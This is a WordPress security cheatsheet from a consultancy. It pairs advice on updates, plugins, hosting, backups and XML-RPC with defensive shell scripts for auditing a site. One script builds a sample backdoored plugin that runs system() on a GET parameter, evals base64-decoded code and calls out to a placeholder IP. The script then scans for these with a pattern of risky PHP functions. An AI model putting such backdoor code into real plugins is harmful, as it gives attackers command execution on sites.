WordPress Security Cheatsheet

Over the years, Cloud Security Partners has offered a wide range of security consultancy services. One responsibility we frequently, and unfortunately, take on is incident response. Some of these incidents involve custom-built applications, but a significant portion involve compromised WordPress installations, and they vary widely in scope. WordPress remains a common target for attackers because of its widespread use and how often it is misconfigured.
WordPress is a popular Content Management System (CMS) that makes it easier to create and manage websites; a blog or site can be set up and shared with the world quickly. However, WordPress is a complex piece of software, and for those not familiar with web technologies and system administration it presents challenges and security risks.
Below is a sample of the common WordPress issues we run into. The list is not exhaustive; it is a primer to help you adopt better security practices from the outset.
- Outdated WordPress
Like many CMSs and WYSIWYG solutions, WordPress is complex: at the time of writing, a fresh install contains over 924 thousand lines of code. Weaknesses are discovered all the time, not because of any intentional action but because of that complexity, and multiple CVEs are assigned to various versions of WordPress every year. Failing to watch the installation and keep the installed version current allows known vulnerabilities to persist.
Check the installed version of WordPress regularly and, if it is outdated, upgrade. Expedite the upgrade when the release contains security fixes, especially for a Common Vulnerabilities and Exposures (CVE) entry. Take a backup before upgrading so that a broken update can be rolled back (see Improper Backup Strategy below).
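The version check above can be scripted. As an added example that is not part of the original cheatsheet, these POSIX shell functions read the installed core version out of wp-includes/version.php (the file in which WordPress core records its own version) and compare it with a release number you supply. The version.php is constructed for the demo, and the latest release is passed in as an assumed value because the example runs offline; on a live host with WP-CLI, wp core version and wp core check-update answer the same question and fetch the current release from api.wordpress.org.

```shell
#!/bin/sh
# Constructed sample tree: a minimal wp-includes/version.php in the shape
# WordPress core ships. Demo data, not a real installation.
WP_ROOT="$(mktemp -d)"
mkdir -p "$WP_ROOT/wp-includes"
cat > "$WP_ROOT/wp-includes/version.php" <<'EOF'
<?php
/**
 * The WordPress version string.
 */
$wp_version = '6.4.2';
$wp_db_version = 56657;
EOF

# Print the installed core version (the value of $wp_version in version.php).
wp_installed_version() {
    grep '^[$]wp_version = ' "$1/wp-includes/version.php" | cut -d "'" -f2
}

# Return 0 when dotted version $1 is older than $2 (6.4 < 6.4.1, 6.4.2 < 6.4.10).
# Components are compared numerically so "10" sorts after "9"; a missing
# component counts as 0. Plain string comparison gets both of these wrong.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, /[.]/); nb = split(b, y, /[.]/)
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# Return 0 when the installation at $1 is behind the latest release $2.
wp_needs_update() {
    version_lt "$(wp_installed_version "$1")" "$2"
}

# Stand-alone demo. LATEST is an assumed input; on a real system take it from
# api.wordpress.org or the release announcement.
LATEST="6.5"
if wp_needs_update "$WP_ROOT" "$LATEST"; then
    echo "WordPress $(wp_installed_version "$WP_ROOT") is behind $LATEST: back up, then upgrade"
else
    echo "WordPress $(wp_installed_version "$WP_ROOT") is current"
fi
```

The same comparison applies to plugin versions once you have read them out of each plugin's header block, which is what WP-CLI's wp plugin list does for you.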
- Outdated or Unsupported Plugins
Many WordPress installations use third-party plugins to extend the functionality of the site. Just like WordPress itself, these should be checked frequently for updates. Plugins carry a further risk, however: end of support. It is not unusual for a plugin to go unmaintained for an extended period, sometimes with an official announcement and sometimes silently, as the developer simply moves on without a word of warning. When updating and validating plugin versions, pay attention to the release date. Depending on the plugin and the functionality it provides, it may be worth migrating away from plugins that have gone a long time without an update.
- Malicious Plugins
A general problem with any application is the risk of malicious libraries and plugins. With an ecosystem as large as WordPress's, publishing malicious plugins to compromise installations is extremely tempting for attackers. Even if only a small percentage of site owners fall for such a ruse, the sheer number of WordPress installations means that thousands of servers, if not more, could be at risk. A compromised host could lose its data, including user accounts, be used as a launch point for attacks on the site's visitors, or become part of a botnet. With arbitrary code running on the host, a malicious actor has many options.
Look for plugins from reputable developers. Malicious plugins can end up on reputable websites, so do not rely on the site hosting the plugin alone; vet the developer as well. Run a malware scan over a candidate plugin before installing it. If you or someone on your team can read PHP, it is worth inspecting the plugin source for suspicious behavior, such as calls to remote servers via cURL, execution of operating system commands with functions like system(), or obfuscated code that is decoded and run at runtime (eval() over base64_decode() output).
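As an added example (not from the original cheatsheet), the following shell script does the kind of first-pass source inspection described above: it greps a plugin directory for PHP functions that run OS commands, evaluate generated code, decode obfuscated payloads, or open outbound connections. The two plugin files are constructed for the demo, one benign and one carrying backdoor indicators; the function list is an assumption about what is worth a look, not an exhaustive malware signature.

```shell
#!/bin/sh
# Constructed plugin directory: one benign plugin and one containing the kind
# of code a backdoored plugin carries. Both files are demo data.
PLUGIN_DIR="$(mktemp -d)"
mkdir -p "$PLUGIN_DIR/clean-widget" "$PLUGIN_DIR/free-seo-booster"
cat > "$PLUGIN_DIR/clean-widget/clean-widget.php" <<'EOF'
<?php
/* Plugin Name: Clean Widget (constructed sample, nothing suspicious) */
function cw_render() { return esc_html( get_option( 'cw_text', '' ) ); }
EOF
cat > "$PLUGIN_DIR/free-seo-booster/seo.php" <<'EOF'
<?php
/* Plugin Name: Free SEO Booster (constructed sample with backdoor indicators) */
if ( isset( $_GET['k'] ) && $_GET['k'] === 'x9' ) { system( $_GET['cmd'] ); }
eval( base64_decode( 'ZWNobyAiaGkiOw==' ) );
$ch = curl_init( 'http://203.0.113.7/beacon' ); curl_exec( $ch );
EOF

# PHP functions that execute OS commands, evaluate generated code, decode
# obfuscated payloads, or open outbound connections. The leading group is a
# word boundary so that e.g. "my_system(" is not counted as "system(".
SUSPECT_PATTERN='(^|[^A-Za-z0-9_])(system|exec|shell_exec|passthru|proc_open|popen|eval|base64_decode|gzinflate|str_rot13|create_function|curl_init|curl_exec|fsockopen)[[:space:]]*\('

# Print file:line:code for every PHP line under $1 that matches the indicator list.
# find/-exec rather than grep -r keeps this portable across GNU and BSD grep.
scan_plugin_dir() {
    find "$1" -type f -name '*.php' -exec grep -nHE "$SUSPECT_PATTERN" {} + 2>/dev/null || true
}

# Number of matching lines under $1 (0 means nothing to review).
scan_plugin_hits() {
    scan_plugin_dir "$1" | wc -l | tr -d ' '
}

# Stand-alone demo.
echo "indicator hits: $(scan_plugin_hits "$PLUGIN_DIR")"
scan_plugin_dir "$PLUGIN_DIR"
```

Every hit deserves a reading of the surrounding code rather than an automatic verdict: outbound HTTP is legitimate in many plugins (licence checks, update feeds), whereas eval() over base64_decode() output, or system() fed from $_GET, almost never is.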
- Missing Security Plugins
Given the complexity of evolving attacks and outdated dependencies, several plugins have been developed to help WordPress operators mitigate these issues. Plugins such as Wordfence act as a mix of plugin scanner, malware scanner, and web application firewall. Using plugins like these adds an extra layer to a robust defense strategy.
A few key areas to highlight: anti-automation (e.g., CAPTCHAs), login rate limiting and account lockouts to slow brute-force attacks, and malware scanning. Going beyond WordPress plugins, consider placing the website behind a service such as Cloudflare for an additional layer of protection.
- Not Regularly Scanning the Installation
Tools such as WPScan assess a WordPress installation from an outsider's point of view. WPScan attempts to identify the installed plugins and the WordPress version in use, then checks whether known vulnerabilities exist in the versions it identified.
This closely mimics what malicious actors do. If you examine your web access logs, you will likely find a significant amount of traffic trying to fingerprint the WordPress version and poking at well-known endpoints such as the login page. Alongside checking for updates and letting security plugins flag potential issues, running WPScan adds another layer of security testing. The WPScan team also maintains a database of known vulnerabilities in WordPress core and popular plugins. Not leaning on such resources is a major mistake.
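The access-log review mentioned above, as an added example that is not part of the original cheatsheet: an awk function that counts, per client address, requests to the endpoints attackers use to fingerprint a site and guess credentials, including the XML-RPC route covered later in this list. The log lines are constructed in Apache combined format (also nginx's default) using documentation addresses; the endpoint list and the threshold are assumptions to tune for your own traffic.

```shell
#!/bin/sh
# Constructed access log in Apache "combined" format. Client addresses are from
# documentation ranges; none of this is real traffic.
ACCESS_LOG="$(mktemp)"
cat > "$ACCESS_LOG" <<'EOF'
198.51.100.23 - - [10/Mar/2024:03:14:01 +0000] "GET /readme.html HTTP/1.1" 200 7412 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2024:03:14:02 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2024:03:14:03 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2024:03:14:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2024:03:14:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2024:03:14:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:03:20:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1640 "-" "python-requests/2.31"
203.0.113.9 - - [10/Mar/2024:03:20:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1640 "-" "python-requests/2.31"
203.0.113.9 - - [10/Mar/2024:03:20:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1640 "-" "python-requests/2.31"
192.0.2.44 - - [10/Mar/2024:03:21:00 +0000] "GET /2024/03/hello-world/ HTTP/1.1" 200 18320 "https://www.example.org/" "Mozilla/5.0"
192.0.2.44 - - [10/Mar/2024:03:21:03 +0000] "GET /wp-login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Mar/2024:03:21:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF

# Print "count ip", highest first, for every client whose requests to WordPress
# fingerprinting or credential-guessing endpoints reach the threshold in $2.
# Counted: POST to wp-login.php or xmlrpc.php (login attempts, including the
# XML-RPC route), readme.html (version banner), ?author=N and the REST users
# endpoint (username enumeration). A GET of wp-login.php is a normal page load
# by a legitimate administrator and is deliberately not counted.
wp_probe_ips() {
    awk -v min="$2" '
    {
        ip = $1; method = substr($6, 2); target = $7
        hit = 0
        if (method == "POST" && (target == "/wp-login.php" || target == "/xmlrpc.php")) hit = 1
        else if (target == "/readme.html") hit = 1
        else if (target ~ /^\/\?author=[0-9]+$/) hit = 1
        else if (target ~ /^\/wp-json\/wp\/v2\/users/) hit = 1
        if (hit) n[ip]++
    }
    END { for (ip in n) if (n[ip] >= min) print n[ip], ip }
    ' "$1" | sort -rn
}

# Stand-alone demo: anything with three or more probe requests.
wp_probe_ips "$ACCESS_LOG" 3
```

Run it against the real log with a threshold that fits your traffic (one legitimate login per session is normal; dozens of POSTs to xmlrpc.php from one address in a minute are not), and pair the result with a WPScan run against your own site (wpscan --url https://your-site) to see the same picture the attacker sees.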
- Host Misconfiguration
Some WordPress installations are hosted by dedicated companies. Other installations are self-hosted on virtual machines somewhere in the cloud, like AWS. While this is a valid strategy, it comes at the cost of managing one’s own environment.
If one is not well-versed in system administration, it is easy to make avoidable mistakes: following a guide that exposes the database to the internet, running the web server as root, or granting world read, write, and execute permissions (chmod 777) to the WordPress tree. On Apache, WordPress also relies on rewrite rules in .htaccess files for its routing; tampering with these files, or blindly dropping such files into directories, can alter the installation's behavior.
How the web server is administered is a potential attack vector as well. SSH is commonly used by tech-savvy users, but FTP, which sends credentials in cleartext, and even phpMyAdmin are still very common. These enlarge the attack surface or, in the case of phpMyAdmin, expose a direct path to a sensitive database. Such services need to be configured correctly and securely, and the credentials used to access them must be strong.
While this list focuses primarily on WordPress, it is worth noting that some issues stem from poor system administration practices in general. As another example…
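As an added example (not from the original cheatsheet), this shell script audits a WordPress tree for the permission mistakes described above and applies the baseline the WordPress documentation recommends (755 for directories, 644 for files, and a wp-config.php readable only by owner and group). The tree is constructed for the demo; the finding categories, and the extra check for PHP files under wp-content/uploads, a common place for web shells to land, are assumptions of this example.

```shell
#!/bin/sh
# Constructed WordPress tree with the mistakes the text describes: a world-
# writable, world-readable wp-config.php, a chmod 777 upload directory, and a
# PHP file inside wp-content/uploads (where only media belongs).
WP_ROOT="$(mktemp -d)"
mkdir -p "$WP_ROOT/wp-includes" "$WP_ROOT/wp-content/uploads/2024/03"
printf '<?php // constructed sample config holding database credentials\n' > "$WP_ROOT/wp-config.php"
printf '<?php // constructed core file\n' > "$WP_ROOT/wp-includes/load.php"
printf '<?php // constructed web shell stand-in\n' > "$WP_ROOT/wp-content/uploads/2024/03/image.php"
chmod 666 "$WP_ROOT/wp-config.php"
chmod 644 "$WP_ROOT/wp-includes/load.php" "$WP_ROOT/wp-content/uploads/2024/03/image.php"
chmod 755 "$WP_ROOT/wp-includes" "$WP_ROOT/wp-content" "$WP_ROOT/wp-content/uploads" "$WP_ROOT/wp-content/uploads/2024"
chmod 777 "$WP_ROOT/wp-content/uploads/2024/03"

# Print one finding per line for the tree at $1; prints nothing when clean.
wp_perm_findings() {
    # Anything other local users (neighbours on a shared host) could modify.
    find "$1" -perm -002 | sed 's/^/world-writable: /'
    # wp-config.php holds the database password; other local users must not read it.
    [ -e "$1/wp-config.php" ] && find "$1/wp-config.php" -perm -004 | sed 's/^/readable by others: /'
    # Executable code in the upload area is the classic post-compromise web shell.
    [ -d "$1/wp-content/uploads" ] && find "$1/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) | sed 's/^/php in uploads: /'
}

# Number of findings for the tree at $1.
wp_perm_finding_count() {
    wp_perm_findings "$1" | wc -l | tr -d ' '
}

# Apply the documented baseline: 755 directories, 644 files, wp-config.php 640.
# It deliberately leaves the uploads finding alone: a PHP file there needs a
# human to look at it (and at how it got there), not a chmod.
wp_perm_fix() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
    chmod 640 "$1/wp-config.php"
}

# Stand-alone demo: report, but do not change, the constructed tree.
echo "findings: $(wp_perm_finding_count "$WP_ROOT")"
wp_perm_findings "$WP_ROOT"
```

The fix assumes the web server runs as a different user from the file owner and only needs to read most of the tree; if the server must write somewhere (uploads, cache), grant that to its group on those directories only rather than falling back to 777.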
- Weak Isolation for Shared Hosts
Sometimes multiple WordPress installations are hosted on a single server. It is tempting to share the same process, operating system user, and folders between them, but this widens the blast radius of a compromise: if WordPress Install 1 (WPI1) is compromised, WordPress Install 2 (WPI2) and all of its files are at risk as well.
This is less common for an individual running several of their own sites, especially since modern WordPress supports multitenancy through Multisite, but hosting providers sometimes host their customers' websites this way. If one customer's website is compromised, potentially every other customer of that provider is at risk. This is a reality we at Cloud Security Partners have seen multiple times, and it is not unique to WordPress.
Apply isolation so that compromising one WordPress installation does not compromise the others: run each installation in its own container or under its own service processes (for example a separate PHP-FPM pool), give each its own database and database credentials with no shared access, and run each as a separate operating system user. Grant as much isolation as possible, because even world-readable files on a shared host can be abused by an attacker or by a malicious fellow customer.
- Improper Backup Strategy
While not fun to plan for, the reality of web hosting is that things can and sometimes do go wrong. Whether the website is compromised and taken down or a bad update breaks it entirely, there is always a chance your WordPress site stops being served. A solid backup strategy is what keeps that downtime short. The worst case is a website that is compromised and deleted with no working backup anywhere.
Take backups at regular intervals. They should cover the WordPress application files, including plugins, themes, and the wp-content/uploads directory, together with a database dump. Test restores periodically to confirm the backups are actually usable; discovering that the only backup is corrupt in the middle of a recovery is a genuine tragedy.
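The backup-and-verify routine described above, as an added example that is not part of the original cheatsheet: a shell function that archives the site files together with a database dump and records a checksum, and a second function that proves the archive is usable by checking the checksum and performing a trial restore into a scratch directory. The site tree and the dump are constructed; in practice the dump comes from mysqldump --single-transaction or wp db export, and the archive belongs off the host.

```shell
#!/bin/sh
# Constructed site tree and a stand-in for a database dump. On a real host the
# dump comes from "mysqldump --single-transaction DBNAME" or "wp db export".
SITE="$(mktemp -d)"
mkdir -p "$SITE/wp-content/plugins/clean-widget" "$SITE/wp-content/uploads"
printf '<?php // constructed wp-config.php\n' > "$SITE/wp-config.php"
printf '<?php // constructed plugin file\n' > "$SITE/wp-content/plugins/clean-widget/clean-widget.php"
DUMP_DIR="$(mktemp -d)"
printf -- '-- constructed dump\nCREATE TABLE wp_options (option_id bigint);\n' > "$DUMP_DIR/db.sql"
BACKUP_DIR="$(mktemp -d)"

# Archive the site files plus db.sql from the dump directory into
# <backup_dir>/wp-backup-<stamp>.tar.gz, record its checksum alongside it,
# and print the archive path.
wp_backup() {  # args: site_dir dump_dir backup_dir stamp
    archive="$3/wp-backup-$4.tar.gz"
    tar -czf "$archive" -C "$1" . -C "$2" db.sql
    cksum < "$archive" > "$archive.cksum"
    printf '%s\n' "$archive"
}

# Return 0 only if the archive matches its recorded checksum, lists cleanly, and
# a trial restore into a scratch directory yields wp-config.php and a non-empty
# dump. The trial restore is the step that actually proves the backup is usable.
wp_backup_verify() {  # args: archive
    [ "$(cksum < "$1")" = "$(cat "$1.cksum")" ] || return 1
    tar -tzf "$1" > /dev/null 2>&1 || return 1
    scratch="$(mktemp -d)"
    tar -xzf "$1" -C "$scratch" 2>/dev/null || return 1
    [ -f "$scratch/wp-config.php" ] && [ -s "$scratch/db.sql" ]
}

# Stand-alone demo: take a backup and verify it.
ARCHIVE="$(wp_backup "$SITE" "$DUMP_DIR" "$BACKUP_DIR" "$(date +%Y%m%d)")"
if wp_backup_verify "$ARCHIVE"; then
    echo "backup ok: $ARCHIVE"
else
    echo "backup FAILED verification: $ARCHIVE"
fi
```

Schedule wp_backup from cron, copy the archive and its .cksum off the host, and run wp_backup_verify against the copy rather than the original: a backup that exists only on the server it protects disappears with the server, and an attacker who has deleted the site will happily delete the local backups too.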
- XMLRPC Enabled
WordPress provides an XML-RPC interface (xmlrpc.php) that lets other applications automate parts of WordPress. In a few specific situations this is a desirable feature. In most, all it does is add attack surface: the interface can be used to brute-force logins, and vulnerabilities unique to XML-RPC are discovered from time to time, such as CVE-2020-28036.
If the interface is not needed, disable it. Returning false from the xmlrpc_enabled filter turns off the authenticated XML-RPC methods; blocking requests to xmlrpc.php at the web server removes the endpoint entirely.
- Poor Application Security in Custom Plugins/Themes
This point is a large one, and we won’t go into full details here as there is simply too much to cover. When designing custom plugins and themes for WordPress, security within that functionality becomes your problem to solve. As such, being aware of authentication, authorization, SQL Injection, Cross-Site Scripting, malicious file upload, and other security issues is a must.
We recommend being aware of the OWASP Top 10, which documents the vulnerability classes frequently seen, and we also recommend going through WordPress’s recommendations for plugin development found here: https://learn.wordpress.org/tutorial/introduction-to-securely-developing-plugins/.
If you need help securing your WordPress installation, we can help! Contact us and we will help you secure your environment today.
contact@cloudsecuritypartners.com